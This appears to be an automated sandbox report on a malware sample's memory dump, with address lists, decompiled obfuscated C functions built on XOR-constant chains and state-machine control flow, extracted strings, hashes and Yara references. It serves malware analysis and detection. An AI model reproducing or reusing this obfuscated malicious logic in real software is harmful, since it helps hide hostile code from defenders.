0x00259e75
0x00259e7c
0x00259e85
0x00259e89
0x00259e91
0x00259e91
0x00259e95
0x00259e95
0x00259e95
0x00259e9b
0x00000000
0x00000000
0x0025a010
0x0025a04c
0x0025a064
0x0025a069
0x0025a06e
0x0025a07a
0x0025a07f
0x0025a085
0x0025a0a5
0x0025a0ae
0x0025a0ae
0x00259e91
0x00259e91
0x00000000
0x00259e91
0x00259e91
0x0025a070
0x00259e91
0x00259e91
0x00000000
0x00259e91
0x00259e91
0x0025a018
0x0025a038
0x00000000
0x00000000
0x0025a03a
0x00000000
0x0025a03a
0x0025a020
0x0025a08e
0x0025a09e
0x0025a0a4
0x00000000
0x0025a08e
0x0025a028
0x00000000
0x00000000
0x0025a02a
0x0025a02a
0x00259ea1
0x00259ff8
0x00259ffd
0x0025a000
0x00259e91
0x00259e91
0x00000000
0x00259e91
0x00259e91
0x00259ead
0x00259f9c
0x00259fab
0x00259fac
0x00259fb0
0x00259fb5
0x00259fbb
0x00000000
0x00000000
0x00259fc1
0x00259fc3
0x00259fcb
0x00259fd2
0x00259fd5
0x00259fd9
0x00000000
0x00259fd9
0x00259eb9
0x00259f8c
0x00000000
0x00259f8c
0x00259ec5
0x00259f42
0x00259f6f
0x00259f74
0x00259f79
0x00259f81
0x00259e91
0x00259e91
0x00000000
0x00259e91
0x00259e91
0x00259ecd
0x00259efb
0x00259f00
0x00259f01
0x00259f24
0x00259f2b
0x00259f31
0x00259f34
0x00259e91
0x00259e91
0x00000000
0x00259e91
0x00259e91
0x00259ed5
0x00000000
0x00000000
0x00259eeb
0x00259eec
0x00259eed
0x00259ef4
0x00259ef4

Strings

K., xrefs: 00259BD1
v+, xrefs: 00259DBF
/,, xrefs: 00259C63
', xrefs: 00259DD4
!t, xrefs: 00259D33
b=, xrefs: 00259C97
$R, xrefs: 00259E31
0], xrefs: 00259D10

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /,$!t$$R$'$0]$K.$b=$v+
API String ID: 0-2997250437
Opcode ID: 3f996a01f93c1ba523a572f275d4763f150af37b35edb0159e1b98bcdac621cf
Instruction ID: 85488962f915a21240ddf186161d8b3a058a1fa43cc578057993a9d7507cbac3
Opcode Fuzzy Hash: 3f996a01f93c1ba523a572f275d4763f150af37b35edb0159e1b98bcdac621cf
Instruction Fuzzy Hash: ECD14371018341CFD768CF24C98A91BBBE1FB84708F208A1DF596862A0D7B9C959CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002512E2, Relevance: 10.2, Strings: 8, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E002512E2() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				unsigned int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				short* _t246;
				intOrPtr _t256;
				void* _t257;
				void* _t261;
				void* _t271;
				intOrPtr _t293;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t306;

				_t306 =  &_v1148;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t261 = 0x1f2b77a6;
				_v1056 = 0x1c0398;
				_v1052 = 0x1a4c8e;
				_v1080 = 0xed6b;
				_v1080 = _v1080 + 0xffffb43c;
				_v1080 = _v1080 ^ 0x000092bf;
				_v1104 = 0xc4aa;
				_v1104 = _v1104 * 0x6d;
				_t297 = 0x23;
				_v1104 = _v1104 / _t297;
				_v1104 = _v1104 ^ 0x00022488;
				_v1112 = 0xb9;
				_v1112 = _v1112 + 0xffff6145;
				_v1112 = _v1112 + 0xc51a;
				_v1112 = _v1112 ^ 0x0000206d;
				_v1132 = 0x8b7;
				_v1132 = _v1132 + 0xffff38b6;
				_v1132 = _v1132 ^ 0xb2a0a749;
				_t298 = 0x57;
				_v1132 = _v1132 / _t298;
				_v1132 = _v1132 ^ 0x00e3f1cf;
				_v1084 = 0x5f6a;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x017dcd17;
				_v1108 = 0xc835;
				_v1108 = _v1108 >> 0xd;
				_t51 =  &_v1108; // 0xd
				_t299 = 3;
				_v1108 =  *_t51 * 7;
				_v1108 = _v1108 ^ 0x00005049;
				_v1100 = 0x845e;
				_v1100 = _v1100 + 0x74c1;
				_v1100 = _v1100 << 3;
				_v1100 = _v1100 ^ 0x0007b300;
				_v1116 = 0xc35d;
				_v1116 = _v1116 * 0x33;
				_v1116 = _v1116 >> 9;
				_v1116 = _v1116 ^ 0x000042ed;
				_v1120 = 0x8ea6;
				_v1120 = _v1120 >> 2;
				_v1120 = _v1120 | 0xab635639;
				_v1120 = _v1120 ^ 0xab63670d;
				_v1092 = 0x4c03;
				_v1092 = _v1092 | 0x601fb915;
				_v1092 = _v1092 ^ 0x04845a80;
				_v1092 = _v1092 ^ 0x649be272;
				_v1076 = 0x4c13;
				_v1076 = _v1076 * 0x2c;
				_v1076 = _v1076 ^ 0x000d0b59;
				_v1068 = 0x8d71;
				_v1068 = _v1068 / _t299;
				_v1068 = _v1068 ^ 0x0000326e;
				_v1064 = 0xd7a3;
				_v1064 = _v1064 >> 0xd;
				_v1064 = _v1064 ^ 0x00005df9;
				_v1060 = 0xed2b;
				_v1060 = _v1060 ^ 0x64d9e662;
				_v1060 = _v1060 ^ 0x64d941f5;
				_v1148 = 0x8835;
				_v1148 = _v1148 + 0xffffd4eb;
				_t300 = 0x61;
				_v1148 = _v1148 * 0x34;
				_v1148 = _v1148 + 0x9f16;
				_v1148 = _v1148 ^ 0x0013bc95;
				_v1140 = 0x3032;
				_v1140 = _v1140 / _t300;
				_v1140 = _v1140 | 0x38ef646c;
				_t125 =  &_v1140; // 0x38ef646c
				_t301 = 0x36;
				_v1140 =  *_t125 / _t301;
				_v1140 = _v1140 ^ 0x010de54d;
				_v1124 = 0xc110;
				_v1124 = _v1124 << 7;
				_t302 = 0x3f;
				_v1124 = _v1124 / _t302;
				_v1124 = _v1124 ^ 0x00019318;
				_v1136 = 0x6a8;
				_v1136 = _v1136 ^ 0x800f5fd5;
				_v1136 = _v1136 ^ 0x17dc092f;
				_t303 = 0x37;
				_v1136 = _v1136 * 0x45;
				_v1136 = _v1136 ^ 0xebf4d978;
				_v1144 = 0x9345;
				_v1144 = _v1144 | 0xef963ffb;
				_v1144 = _v1144 / _t303;
				_v1144 = _v1144 ^ 0x045b7df9;
				_v1128 = 0xf550;
				_v1128 = _v1128 + 0xffff8b4b;
				_v1128 = _v1128 >> 1;
				_v1128 = _v1128 >> 8;
				_v1128 = _v1128 ^ 0x00000cb5;
				_v1072 = 0xd52f;
				_v1072 = _v1072 ^ 0xc146d284;
				_v1072 = _v1072 ^ 0xc146011a;
				_v1088 = 0xae87;
				_v1088 = _v1088 | 0xff36597f;
				_v1088 = _v1088 ^ 0xff36d7e8;
				_v1096 = 0xe081;
				_v1096 = _v1096 ^ 0xf8f61e03;
				_v1096 = _v1096 + 0xffff4bc3;
				_v1096 = _v1096 ^ 0xf8f624ac;
				do {
					while(_t261 != 0xe2b4321) {
						if(_t261 == 0x123adc07) {
							E0024B75F();
							_t261 = 0x38f4cd20;
							continue;
						}
						if(_t261 == 0x15946a4d) {
							_t246 = E002428CE( &_v520, _v1128, _v1072);
							__eflags = 0;
							 *_t246 = 0;
							return E00245AEA(_v1088, _v1096,  &_v520);
						}
						if(_t261 == 0x1dde1df8) {
							_push(_t261);
							E0025A889(_v1068, _v1064,  &_v1040);
							E00242BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
							_t212 =  &_v1136; // 0xd
							_push( &_v1040);
							_push( &_v520);
							E00247B63( *_t212, _v1144, __eflags);
							_t306 =  &(_t306[0xa]);
							_t261 = 0x15946a4d;
							continue;
						}
						if(_t261 == 0x1f2b77a6) {
							_t256 =  *0x25ca2c; // 0x6d8300
							__eflags =  *((intOrPtr*)(_t256 + 0x224));
							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
							continue;
						}
						_t313 = _t261 - 0x38f4cd20;
						if(_t261 != 0x38f4cd20) {
							goto L12;
						}
						_push(_v1132);
						_t257 = E0025889D(0x25c9b0, _v1112, _t313);
						_pop(_t271);
						_t193 =  &_v1116; // 0xd
						_t293 =  *0x25ca2c; // 0x6d8300
						_t197 = _t293 + 0x230; // 0x670056
						E0024C680(_t197, _v1108, _v1100, _t271,  *_t193,  *0x25ca2c, _t257,  &_v520);
						_t256 = E00252025(_v1120, _t257, _v1092, _v1076);
						_t306 =  &(_t306[9]);
						_t261 = 0x1dde1df8;
					}
					E002563C1();
					_t261 = 0x38f4cd20;
					L12:
					__eflags = _t261 - 0x3a4044d2;
				} while (__eflags != 0);
				return _t256;
			}

0x002512e2
0x002512e8
0x002512ef
0x002512f4
0x002512f9
0x00251301
0x00251309
0x00251311
0x00251319
0x00251321
0x00251332
0x0025133c
0x00251341
0x00251347
0x0025134f
0x00251357
0x0025135f
0x00251367
0x0025136f
0x00251377
0x0025137f
0x0025138b
0x00251390
0x00251396
0x0025139e
0x002513a6
0x002513ab
0x002513b3
0x002513bb
0x002513c0
0x002513c5
0x002513c6
0x002513ca
0x002513d2
0x002513da
0x002513e2
0x002513e7
0x002513ef
0x002513fc
0x00251400
0x00251405
0x0025140d
0x00251415
0x0025141a
0x00251422
0x0025142a
0x00251432
0x0025143a
0x00251442
0x0025144a
0x00251457
0x0025145b
0x00251463
0x00251471
0x00251475
0x0025147d
0x00251485
0x0025148a
0x00251492
0x0025149a
0x002514a2
0x002514aa
0x002514b2
0x002514c3
0x002514d0
0x002514d9
0x002514e1
0x002514e9
0x002514f9
0x002514fd
0x00251505
0x00251509
0x0025150e
0x00251514
0x0025151c
0x00251524
0x0025152d
0x00251532
0x00251538
0x00251540
0x00251548
0x00251550
0x0025155d
0x0025155e
0x00251562
0x0025156a
0x00251572
0x00251580
0x00251584
0x0025158c
0x00251594
0x0025159c
0x002515a0
0x002515a5
0x002515ad
0x002515b5
0x002515bd
0x002515c5
0x002515cd
0x002515d5
0x002515dd
0x002515e5
0x002515ed
0x002515f5
0x002515fd
0x002515fd
0x00251607
0x00251713
0x00251718
0x00000000
0x00251718
0x00251613
0x00251747
0x00251750
0x00251752
0x00000000
0x00251767
0x0025161f
0x002516b9
0x002516bf
0x002516e0
0x002516f0
0x002516f4
0x002516fc
0x002516fd
0x00251702
0x00251705
0x00000000
0x00251705
0x0025162b
0x0025169b
0x002516a2
0x002516a9
0x00000000
0x002516a9
0x0025162d
0x0025162f
0x00000000
0x00000000
0x00251635
0x00251642
0x00251647
0x00251659
0x00251666
0x00251670
0x00251676
0x00251689
0x0025168e
0x00251691
0x00251691
0x00251723
0x00251728
0x0025172a
0x0025172a
0x0025172a
0x00000000

Strings

n2, xrefs: 00251475
ld8, xrefs: 00251505
k, xrefs: 00251309
B, xrefs: 00251405
j_, xrefs: 0025139E
m , xrefs: 002513C0, 0025170F, 002516F0, 00251659
+, xrefs: 00251492
IP, xrefs: 002513CA

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: m $+$IP$j_$k$ld8$n2$B
API String ID: 0-4100556268
Opcode ID: ddfe2bab3256add382b1f7896d7714a78edcb8e279b63326a2b911e7c986abca
Instruction ID: b030d1ab2872ea3dc24a7d800b0310c15c636de5f383f18846a79820163b688e
Opcode Fuzzy Hash: ddfe2bab3256add382b1f7896d7714a78edcb8e279b63326a2b911e7c986abca
Instruction Fuzzy Hash: 15B150710183819FD358CF25C589A1BBBE1BBC4758F508A1EF596862A0C7B4CA19CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0024B75F, Relevance: 10.2, Strings: 8, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0024B75F() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				void* _t241;
				void* _t265;
				signed int* _t269;

				_t269 =  &_v88;
				_v64 = 0xcca9;
				_v64 = _v64 | 0x3d0c477d;
				_v64 = _v64 + 0x3ec7;
				_v64 = _v64 ^ 0xbd0d0ec5;
				_v60 = 0x38c3;
				_v60 = _v60 << 4;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x00000e32;
				_v88 = 0xa439;
				_v88 = _v88 + 0x34d8;
				_v88 = _v88 << 0xe;
				_v4 = 0;
				_v88 = _v88 * 0x46;
				_t265 = 0x32863a22;
				_v88 = _v88 ^ 0xd6a9fef0;
				_v32 = 0x5041;
				_v32 = _v32 ^ 0x94936571;
				_v32 = _v32 ^ 0x94934631;
				_v52 = 0x47aa;
				_t228 = 0x6b;
				_v52 = _v52 * 0x59;
				_v52 = _v52 / _t228;
				_v52 = _v52 ^ 0x00001934;
				_v76 = 0x9d13;
				_v76 = _v76 | 0xffbf7fdf;
				_t229 = 0x4b;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0xf1ffac33;
				_v56 = 0x2528;
				_v56 = _v56 ^ 0xff11bbbe;
				_v56 = _v56 / _t229;
				_v56 = _v56 ^ 0x0366a499;
				_v80 = 0x942e;
				_t230 = 0x65;
				_v80 = _v80 / _t230;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x4cc19e00;
				_v80 = _v80 ^ 0x4db6b316;
				_v28 = 0xb3;
				_t231 = 0x4f;
				_v28 = _v28 / _t231;
				_v28 = _v28 ^ 0x00007dc1;
				_v84 = 0xb6fa;
				_t232 = 0x7e;
				_v84 = _v84 * 0x7b;
				_v84 = _v84 + 0x74c4;
				_v84 = _v84 + 0xffff1df9;
				_v84 = _v84 ^ 0x005758b1;
				_v48 = 0xb943;
				_v48 = _v48 / _t232;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x005e2ced;
				_v24 = 0x593;
				_t233 = 0x59;
				_t225 = _v4;
				_v24 = _v24 * 0x2c;
				_v24 = _v24 ^ 0x0000804c;
				_v72 = 0xf7ad;
				_v72 = _v72 / _t233;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xb94c;
				_v72 = _v72 ^ 0x0003edcb;
				_v20 = 0xede5;
				_t234 = 0x17;
				_v20 = _v20 / _t234;
				_v20 = _v20 ^ 0x00002281;
				_v40 = 0x2895;
				_v40 = _v40 << 7;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x144a8d7d;
				_v44 = 0x7178;
				_v44 = _v44 >> 0xa;
				_t235 = 0xf;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x00005c52;
				_v68 = 0xc8ae;
				_v68 = _v68 | 0xfda66fe8;
				_v68 = _v68 << 0xa;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x04dddb27;
				_v12 = 0xea07;
				_v12 = _v12 + 0xffffa6b0;
				_v12 = _v12 ^ 0x0000adca;
				_v16 = 0x7743;
				_v16 = _v16 | 0x2d86c018;
				_v16 = _v16 ^ 0x2d86a9dd;
				_v36 = 0x116e;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x542dd378;
				_v36 = _v36 ^ 0x542dcb57;
				while(1) {
					L1:
					_t236 = 0x5c;
					_t216 = 0x1a27fc18;
					do {
						while(_t265 != 0x14fc2c0b) {
							if(_t265 == _t216) {
								_t217 = E0024E22B(_v20, _v40, _v8, _t225, _v44);
								_t269 =  &(_t269[3]);
								__eflags = _t217;
								_t265 = 0x35b0a114;
								_v4 = 0 | __eflags == 0x00000000;
								goto L1;
							} else {
								if(_t265 == 0x2364314f) {
									_push(_v32);
									_t218 = E0025889D(0x25c9d0, _v88, __eflags);
									_pop(_t241);
									__eflags = E00253EB3(_v52, _t241, _t218, _v76, _v56, 0x25c9d0, _v80, _v28, 0x25c9d0, _v84, 0x25c9d0, _v60, _v64,  &_v8);
									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
									E00252025(_v48, _t218, _v24, _v72);
									_t269 =  &(_t269[0xf]);
									_t236 = 0x5c;
									L16:
									_t216 = 0x1a27fc18;
									goto L17;
								} else {
									if(_t265 == 0x32863a22) {
										_t265 = 0x14fc2c0b;
										continue;
									} else {
										if(_t265 != 0x35b0a114) {
											goto L17;
										} else {
											E002465A2(_v8, _v68, _v12, _v16, _v36);
										}
									}
								}
							}
							L8:
							return _v4;
						}
						_t226 =  *0x25ca2c; // 0x6d8300
						_t227 = _t226 + 0x230;
						while(1) {
							__eflags =  *_t227 - _t236;
							if( *_t227 == _t236) {
								break;
							}
							_t227 = _t227 + 2;
							__eflags = _t227;
						}
						_t225 = _t227 + 2;
						__eflags = _t227 + 2;
						_t265 = 0x2364314f;
						goto L16;
						L17:
						__eflags = _t265 - 0x34b93fb8;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x0024b75f
0x0024b762
0x0024b76c
0x0024b776
0x0024b77e
0x0024b786
0x0024b78e
0x0024b793
0x0024b798
0x0024b7a0
0x0024b7a7
0x0024b7ae
0x0024b7b2
0x0024b7be
0x0024b7c2
0x0024b7c7
0x0024b7cf
0x0024b7d7
0x0024b7df
0x0024b7e7
0x0024b7f6
0x0024b7f9
0x0024b805
0x0024b809
0x0024b811
0x0024b819
0x0024b826
0x0024b829
0x0024b82d
0x0024b835
0x0024b83d
0x0024b84d
0x0024b851
0x0024b859
0x0024b865
0x0024b86a
0x0024b870
0x0024b875
0x0024b87d
0x0024b885
0x0024b891
0x0024b896
0x0024b89c
0x0024b8a4
0x0024b8b1
0x0024b8b2
0x0024b8b6
0x0024b8be
0x0024b8c6
0x0024b8ce
0x0024b8dc
0x0024b8e0
0x0024b8e5
0x0024b8ed
0x0024b903
0x0024b906
0x0024b90a
0x0024b90e
0x0024b916
0x0024b926
0x0024b92a
0x0024b92f
0x0024b937
0x0024b93f
0x0024b94b
0x0024b950
0x0024b956
0x0024b95e
0x0024b966
0x0024b96b
0x0024b970
0x0024b978
0x0024b980
0x0024b989
0x0024b98c
0x0024b990
0x0024b998
0x0024b9a0
0x0024b9a8
0x0024b9ad
0x0024b9b2
0x0024b9ba
0x0024b9c2
0x0024b9ca
0x0024b9d2
0x0024b9da
0x0024b9e2
0x0024b9ea
0x0024b9f2
0x0024b9f7
0x0024b9ff
0x0024ba07
0x0024ba07
0x0024ba09
0x0024ba0a
0x0024ba0f
0x0024ba0f
0x0024ba19
0x0024bae9
0x0024baf0
0x0024baf3
0x0024baf5
0x0024bafd
0x00000000
0x0024ba1f
0x0024ba25
0x0024ba67
0x0024ba74
0x0024ba79
0x0024baaf
0x0024bac8
0x0024bacb
0x0024bad0
0x0024bad5
0x0024bb24
0x0024bb24
0x00000000
0x0024ba27
0x0024ba2d
0x0024ba63
0x00000000
0x0024ba2f
0x0024ba35
0x00000000
0x0024ba3b
0x0024ba4f
0x0024ba54
0x0024ba35
0x0024ba2d
0x0024ba25
0x0024ba57
0x0024ba62
0x0024ba62
0x0024bb06
0x0024bb0c
0x0024bb17
0x0024bb17
0x0024bb1a
0x00000000
0x00000000
0x0024bb14
0x0024bb14
0x0024bb14
0x0024bb1c
0x0024bb1c
0x0024bb1f
0x00000000
0x0024bb29
0x0024bb29
0x0024bb29
0x00000000
0x0024bb35

Strings

O1d#, xrefs: 0024BB1F
xq, xrefs: 0024B978
,^, xrefs: 0024B8E5
Cw, xrefs: 0024B9D2
O1d#, xrefs: 0024BA1F
(%, xrefs: 0024B835
R\, xrefs: 0024B990
AP, xrefs: 0024B7CF

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
API String ID: 0-1090126677
Opcode ID: fff54f95ff17237c27e415f4e2650cfbcdc8ca469cad32d301a6fe38600e5103
Instruction ID: 1436c3b288dcf4f097512e2638c29c2d6ad8dd5ca84ade175ba04626810cb90a
Opcode Fuzzy Hash: fff54f95ff17237c27e415f4e2650cfbcdc8ca469cad32d301a6fe38600e5103
Instruction Fuzzy Hash: 1AA142B16093409FE359CF64C98A81BBBE2FBC4B48F10491DF585862A0D7B9CA59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0024EA4C, Relevance: 10.2, Strings: 8, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0024EA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* __ecx;
				void* _t188;
				void* _t219;
				intOrPtr* _t220;
				void* _t222;
				void* _t241;
				void* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int* _t252;

				_t220 = _a12;
				_push(_a16);
				_t241 = __edx;
				_push(_t220);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0024602B(_t188);
				_v8 = 0x50f8de;
				_t242 = 0;
				_v4 = _v4 & 0;
				_t252 =  &(( &_v80)[6]);
				_v76 = 0x4711;
				_v76 = _v76 + 0x6e0d;
				_t222 = 0x302d2de5;
				_v76 = _v76 << 0x10;
				_v76 = _v76 | 0x353296c6;
				_v76 = _v76 ^ 0xb53e96c7;
				_v52 = 0x1390;
				_v52 = _v52 << 4;
				_v52 = _v52 | 0x6ec3950a;
				_t243 = 0x1f;
				_v52 = _v52 * 0x25;
				_v52 = _v52 ^ 0x024a5273;
				_v64 = 0xc0d5;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x4ce1daf8;
				_v64 = _v64 + 0xffff0c87;
				_v64 = _v64 ^ 0x4ce0d906;
				_v24 = 0xb115;
				_v24 = _v24 / _t243;
				_v24 = _v24 ^ 0x000025ae;
				_v68 = 0xbf02;
				_v68 = _v68 >> 1;
				_v68 = _v68 >> 7;
				_v68 = _v68 | 0xaaaffe07;
				_v68 = _v68 ^ 0xaaaf82c8;
				_v72 = 0x967c;
				_v72 = _v72 ^ 0xbb45b93e;
				_t244 = 0x5e;
				_v72 = _v72 * 0x31;
				_v72 = _v72 | 0x543854ee;
				_v72 = _v72 ^ 0xdc3e0629;
				_v28 = 0xb197;
				_v28 = _v28 / _t244;
				_v28 = _v28 ^ 0x00005929;
				_v80 = 0xf6df;
				_v80 = _v80 * 0x2c;
				_v80 = _v80 + 0xffff5b03;
				_v80 = _v80 ^ 0xcc4f4477;
				_v80 = _v80 ^ 0xcc66b212;
				_v60 = 0x7f94;
				_v60 = _v60 * 0x70;
				_v60 = _v60 + 0xffff5d6f;
				_v60 = _v60 + 0xffffe912;
				_v60 = _v60 ^ 0x0037713c;
				_v40 = 0x7639;
				_v40 = _v40 ^ 0xf24db204;
				_v40 = _v40 * 0xf;
				_v40 = _v40 ^ 0x328e289a;
				_v20 = 0xd74f;
				_v20 = _v20 | 0xd22ad029;
				_v20 = _v20 ^ 0xd22a9d24;
				_v16 = 0xecd5;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x0076152b;
				_v44 = 0x5bc3;
				_v44 = _v44 + 0x5ef7;
				_v44 = _v44 | 0x81401b0a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x00015921;
				_v32 = 0x3f29;
				_t245 = 0x22;
				_v32 = _v32 / _t245;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x00005264;
				_v48 = 0x731;
				_v48 = _v48 | 0x306aed8f;
				_v48 = _v48 + 0xffff48d8;
				_t246 = 0x76;
				_v48 = _v48 / _t246;
				_v48 = _v48 ^ 0x0069195c;
				_v36 = 0x33bb;
				_t247 = 0x45;
				_v36 = _v36 / _t247;
				_v36 = _v36 + 0xffffe7cb;
				_v36 = _v36 ^ 0xfffff379;
				_v56 = 0xdfcb;
				_t248 = 0x48;
				_v56 = _v56 / _t248;
				_t249 = 0x3a;
				_v56 = _v56 / _t249;
				_v56 = _v56 * 0x52;
				_v56 = _v56 ^ 0x00005386;
				do {
					while(_t222 != 0x246653ae) {
						if(_t222 == 0x260f4fd2) {
							_push(_t222);
							_push(_t222);
							_t242 = E00248736(_v12);
							if(_t242 != 0) {
								_t222 = 0x246653ae;
								continue;
							}
						} else {
							if(_t222 == 0x2ff0f75c) {
								_t219 = E002559A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
								_t252 =  &(_t252[0xb]);
								if(_t219 != 0) {
									_t222 = 0x260f4fd2;
									continue;
								}
							} else {
								if(_t222 != 0x302d2de5) {
									goto L11;
								} else {
									_t222 = 0x2ff0f75c;
									continue;
								}
							}
						}
						goto L12;
					}
					E002559A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
					_t252 =  &(_t252[0xb]);
					 *_t220 = _v12;
					_t222 = 0x6a13bb9;
					L11:
				} while (_t222 != 0x6a13bb9);
				L12:
				return _t242;
			}

0x0024ea50
0x0024ea57
0x0024ea5b
0x0024ea5d
0x0024ea5e
0x0024ea62
0x0024ea66
0x0024ea68
0x0024ea6d
0x0024ea75
0x0024ea77
0x0024ea7b
0x0024ea7e
0x0024ea88
0x0024ea90
0x0024ea95
0x0024ea9a
0x0024eaa2
0x0024eaaa
0x0024eab2
0x0024eab7
0x0024eac6
0x0024eac9
0x0024eacd
0x0024ead5
0x0024eadd
0x0024eae2
0x0024eaea
0x0024eaf2
0x0024eafa
0x0024eb0a
0x0024eb0e
0x0024eb16
0x0024eb1e
0x0024eb22
0x0024eb27
0x0024eb2f
0x0024eb37
0x0024eb3f
0x0024eb4c
0x0024eb4d
0x0024eb51
0x0024eb59
0x0024eb61
0x0024eb6f
0x0024eb73
0x0024eb7b
0x0024eb88
0x0024eb8c
0x0024eb94
0x0024eb9c
0x0024eba4
0x0024ebb1
0x0024ebb5
0x0024ebbd
0x0024ebc5
0x0024ebcd
0x0024ebd5
0x0024ebe2
0x0024ebe6
0x0024ebee
0x0024ebf6
0x0024ebfe
0x0024ec06
0x0024ec10
0x0024ec15
0x0024ec1d
0x0024ec25
0x0024ec2d
0x0024ec35
0x0024ec3a
0x0024ec42
0x0024ec50
0x0024ec55
0x0024ec5b
0x0024ec60
0x0024ec68
0x0024ec70
0x0024ec78
0x0024ec84
0x0024ec89
0x0024ec8f
0x0024ec97
0x0024eca3
0x0024eca8
0x0024ecae
0x0024ecb6
0x0024ecbe
0x0024ecca
0x0024eccf
0x0024ecd9
0x0024ece1
0x0024ecea
0x0024ecee
0x0024ecf6
0x0024ecf6
0x0024ed04
0x0024ed65
0x0024ed66
0x0024ed70
0x0024ed76
0x0024ed78
0x00000000
0x0024ed78
0x0024ed06
0x0024ed0c
0x0024ed46
0x0024ed4b
0x0024ed50
0x0024ed52
0x00000000
0x0024ed52
0x0024ed0e
0x0024ed14
0x00000000
0x0024ed1a
0x0024ed1a
0x00000000
0x0024ed1a
0x0024ed14
0x0024ed0c
0x00000000
0x0024ed04
0x0024eda3
0x0024edaf
0x0024edb2
0x0024edb4
0x0024edb9
0x0024edb9
0x0024edc6
0x0024edce

Strings

9v, xrefs: 0024EBCD
dR, xrefs: 0024EC60
<q7, xrefs: 0024EBC5
)?, xrefs: 0024EC42
--0, xrefs: 0024EA90
T8T, xrefs: 0024EB51
n, xrefs: 0024EA88
--0, xrefs: 0024ED0E

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: n$)?$9v$<q7$dR$--0$--0$T8T
API String ID: 0-1820671589
Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
